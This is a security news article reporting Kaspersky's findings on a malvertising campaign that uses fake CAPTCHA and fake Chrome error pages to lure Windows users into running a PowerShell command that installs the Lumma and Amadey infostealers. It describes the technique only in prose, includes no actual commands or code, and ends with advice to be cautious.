New malware campaign targets PC users with fake CAPTCHAs and browser errors

Kaspersky has detected a new wave of attacks as part of a malicious campaign distributed via online advertisements aimed at Windows PC users. The process is simple: while browsing the web, targeted Internet users unknowingly click on an ad that hides the entire screen and redirects them to a fake CAPTCHA page, or to a fake Chrome error message. prompting them to follow the steps to download an infostealer. Between September and October 2024, Kaspersky telemetry recorded more than 140,000 occurrences of these invasive ads, with more than 20,000 users having been redirected to pages hosting malicious scripts. In most cases, these are Brazilian, Spanish, Italian and Russian Internet users. To protect themselves, experts recommend users to exercise caution and avoid responding to suspicious requests.

A CAPTCHA is a security device used on websites and applications to verify whether a user is human or whether they are an automated program or a bot. Over the course of this year, there have been reports of threat actors distributing the Lumma stealer using fake CAPTCHAs, primarily targeting gamers. By visiting online gaming sites, they are encouraged to click on an advertisement covering the entire screen. They are redirected to a fake CAPTCHA page with instructions to download the virus. When they click the “I’m not a robot” button, Windows PowerShell code is copied to their computer’s clipboard. Instructional messages then invite them to paste the code into the terminal box and press Enter, triggering the download and launch of the Lumma virus.

The malware looks for cryptocurrency-related files, cookies, and password manager data on the victim’s device. By visiting the web pages of various e-commerce platforms, Lumma increases their number of views, allowing the attackers to make additional financial gains.

A fake CAPTCHA containing malicious instructions

Faced with these new attacks, Kaspersky researchers have identified another attack scenario in which, instead of a CAPTCHA, an error message is displayed on a web page, designed to resemble a service message from the Chrome browser. The attackers ask their victim to “copy the patch” into the terminal window (the patch being the same PowerShell command described above).

A fake message that imitates Google Chrome

Kaspersky has uncovered a new wave of attacks, not just targeting gamers, distributed through file sharing services, web applications, bookmaker portals, adult content pages, communities of animators, and many other channels. Attackers are also using the Amadey Trojan in this attack wave. Like Lumma, it steals credentials from popular browsers and cryptocurrency wallets, but it can also take screenshots, obtain credentials for remote access services, and download a tool remote access on the victim’s device, allowing hackers to gain full access.

“The attackers purchased ad space, and if a user sees this ad and clicks on it, they are redirected to malicious resources, a commonly used tactic. This new wave involves a significantly expanded distribution network and the introduction of a new attack scenario that affects more victims. Now, Internet users can be diverted by a fake CAPTCHA question or an error message from the Chrome web page, and become victims of a stealer with new features. Businesses and individuals should exercise caution and critical thinking before following suspicious messages they see online,” says Vasily Kolesnikov, security expert at Kaspersky.